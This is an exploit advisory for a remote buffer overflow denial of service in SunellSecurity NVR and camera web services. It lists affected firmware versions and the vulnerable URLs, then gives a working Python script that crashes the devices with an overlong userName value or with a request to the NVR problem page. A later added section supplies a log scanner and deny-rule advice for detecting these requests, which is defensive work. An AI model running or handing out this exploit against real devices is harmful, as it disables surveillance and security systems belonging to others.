SunellSecurity NVR / Camera - Buffer Overflow - Denial Of Service
Author: qwsj / https://github.com/qwsj
Vulnerability Type: Buffer Overflow
Attack type: Remote
Vendor of Product: SunellSecurity, Shenzhen Sunell Technology
Effect: critically terminates the web service.
Service restart time after exploitation: 1-3 minutes.
# CAMs
Vulnerability in the CGI script
More info: https://cxsecurity.com/issue/WLB-2016110021
# NVRs
Vulnerability in the ASP + JS scripts - b/o dos
Date: 2017-11-11
Problem URL: http://IP:PORT/asppage/common/ipc_index.asp
Product and firmware:
- H265 32CH - 3.0 (final release 2017-03-31) or older
- H265 64CH - 3.0 (final release 2017-03-31) or older
- H264 4CH - 3.0 (final release 2017-03-31) or older
- H264 8CH - 3.0 (final release 2017-03-31) or older
- H264 16CH - 3.0 (final release 2017-03-31) or older
Exploit:
#!/usr/bin/env python
import urllib2
import sys

class sunellbo():
    def __init__(self, addr, port):
        self.addr = addr
        self.port = port

    def snvr(self):
        self.uurl = 'http://'+self.addr+':'+self.port+'/asppage/common/ipc_index.asp'
        print 'NVR mode. ADDR: '+self.addr+' PORT: '+self.port
        try:
            urllib2.urlopen(self.uurl, timeout = 5).read()
        except:
            sys.exit()

    def scam(self):
        self.camload = ('A' * 1071)
        self.uurl = 'http://'+self.addr+':'+self.port+'/cgi-bin/image.cgi?userName=-'+self.camload
        print 'CAM mode. ADDR: '+self.addr+' PORT: '+self.port
        try:
            urllib2.urlopen(self.uurl, timeout = 5).read()
        except:
            sys.exit()

if sys.argv[1] == 'nvr':
    sunellbo(sys.argv[2], sys.argv[3]).snvr()
elif sys.argv[1] == 'cam':
    sunellbo(sys.argv[2], sys.argv[3]).scam()
else:
    print 'Use: python '+sys.argv[0]+' [MODE] [IP/DOMAIN] [PORT]'
    print 'MODE: cam / nvr'
    print 'IP/DOMAIN: x.x.x.x / example.com'
    print 'PORT: 80 / 81 / other'
    sys.exit()
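
Detection side of the two requests above, as an added example that is not part of the original advisory or the author's code: it scans HTTP access-log lines for an overlong userName on /cgi-bin/image.cgi and for any hit on the NVR problem URL. Assumptions: logs come from a reverse proxy or gateway in front of the devices in common/combined format, legitimate user names stay under 64 characters, and the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Paths taken from the advisory above.
CAM_PATH = "/cgi-bin/image.cgi"
NVR_PATH = "/asppage/common/ipc_index.asp"
# Assumption: legitimate user names are far shorter than this.
MAX_USERNAME_LEN = 64

# Source address and request line of a common/combined log entry (assumed format).
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def classify(line):
    """Return (source, reason) for a suspicious log line, or None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path = url.path.lower()
    if path == NVR_PATH:
        # The advisory lists this URL as the NVR trigger; review every hit.
        return (m.group("src"), "request to NVR problem URL")
    if path == CAM_PATH:
        values = parse_qs(url.query, keep_blank_values=True).get("userName", [])
        longest = max((len(v) for v in values), default=0)
        if longest > MAX_USERNAME_LEN:
            return (m.group("src"), "userName length %d on image.cgi" % longest)
    return None

def scan(lines):
    """Return all (source, reason) findings, in log order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines using documentation address ranges, not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Nov/2017:10:00:01 +0000] "GET /cgi-bin/image.cgi?userName=admin HTTP/1.1" 200 512',
    '198.51.100.7 - - [11/Nov/2017:10:00:05 +0000] "GET /cgi-bin/image.cgi?userName=-'
    + "A" * 1071 + ' HTTP/1.1" 502 0',
    '198.51.100.7 - - [11/Nov/2017:10:00:09 +0000] "GET /asppage/common/ipc_index.asp HTTP/1.1" 502 0',
    '192.0.2.10 - - [11/Nov/2017:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for src, reason in scan(SAMPLE_LOG):
        print(src, reason)
```

The same two conditions can be enforced as deny rules on the proxy, so the requests never reach the device's web service.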